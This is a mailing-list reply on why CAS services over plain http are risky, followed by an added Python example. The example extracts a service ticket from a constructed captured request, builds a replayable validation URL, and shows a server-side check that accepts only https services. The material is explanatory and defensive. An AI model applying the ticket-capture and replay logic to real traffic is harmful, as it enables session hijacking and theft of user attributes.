> I want to check the risk scenario for authorizing CAS services that are not
> behind SSL, e.g. http://example.com/casapp
> Is the scenario that someone might intercept the ticket from the redirect to
> the users browser?
I believe that's the most common concern, yes, but certainly not the only one. All the data that flows over the connection is liable to interception, including potentially sensitive data returned by the CAS server like proxy tickets and attribute release payload. With tools like FireSheep, interception of data like this over wifi networks is trivially easy, so disclosure of this kind of data should be of considerable concern.

My standard rhetorical question for these cases: Why bother with authentication if the subsequent data is trivially difficult to steal?

M

--
You are currently subscribed to [email protected] as: [email protected]
To unsubscribe, change settings or access archives, see http://www.ja-sig.org/wiki/display/JSG/cas-user
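
To make the interception scenario in the thread concrete, here is an added example (not code from the original post or from the CAS project) that parses a constructed cleartext HTTP request of the kind a browser sends to an `http://` CAS service after the login redirect, pulls the service ticket out of it, and builds the `/serviceValidate` request that whoever captured it could replay. It also shows the simple server-side check that prevents the situation in the first place: refuse to register a service URL whose scheme is not `https`. The request bytes, ticket value and CAS hostname are all made up for this example.

```python
from urllib.parse import parse_qs, urlencode, urlsplit, urlunsplit

# Constructed sample: the plaintext HTTP request a browser sends to a
# CAS-protected service after the CAS server redirects it back with a ticket.
# Hostnames and the ticket value are invented for this example.
CAPTURED_REQUEST = (
    "GET /casapp?ticket=ST-1234-abcdefghijklmnop-cas01 HTTP/1.1\r\n"
    "Host: example.com\r\n"
    "User-Agent: Mozilla/5.0\r\n"
    "\r\n"
)

# Hypothetical CAS server base URL used to build the validation request.
CAS_BASE = "https://cas.example.edu/cas"


def extract_ticket_from_request(raw):
    """Parse a captured cleartext HTTP request; return (service_url, ticket).

    Returns (None, None) when the request is not a GET carrying a CAS ticket.
    The reconstructed service URL uses the http scheme because the request was
    observed on the wire unencrypted, which is exactly the scenario discussed.
    """
    head, _, _ = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    host = headers.get("host")
    if method != "GET" or not host:
        return None, None
    parts = urlsplit(target)
    query = parse_qs(parts.query)
    ticket = query.get("ticket", [None])[0]
    if ticket is None:
        return None, None
    # The service identifier presented to /serviceValidate is the client's own
    # URL with the ticket parameter stripped off.
    remaining = {k: v for k, v in query.items() if k != "ticket"}
    service = urlunsplit(
        ("http", host, parts.path, urlencode(remaining, doseq=True), "")
    )
    return service, ticket


def build_validate_url(cas_base, service, ticket):
    """The CAS 2.0 validation request; with the ticket in hand anyone can send it.

    Service tickets are single-use, so the eavesdropper wins only by racing the
    legitimate client, but the proxy tickets and attributes the reply carries
    are then theirs.
    """
    params = urlencode({"service": service, "ticket": ticket})
    return cas_base.rstrip("/") + "/serviceValidate?" + params


def service_url_allowed(url):
    """Server-side registry policy: only register services reachable over https.

    This is the check that removes the cleartext redirect from the picture.
    """
    parts = urlsplit(url)
    return parts.scheme == "https" and bool(parts.netloc)


if __name__ == "__main__":
    svc, tkt = extract_ticket_from_request(CAPTURED_REQUEST)
    print("captured service:", svc)
    print("captured ticket: ", tkt)
    print("replayable request:", build_validate_url(CAS_BASE, svc, tkt))
    for candidate in ("http://example.com/casapp", "https://example.com/casapp"):
        print(candidate, "allowed" if service_url_allowed(candidate) else "rejected")
```

Running it shows the ticket recovered from a single captured request and the validation URL it unlocks; the registry check rejects `http://example.com/casapp` and accepts the `https://` form.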
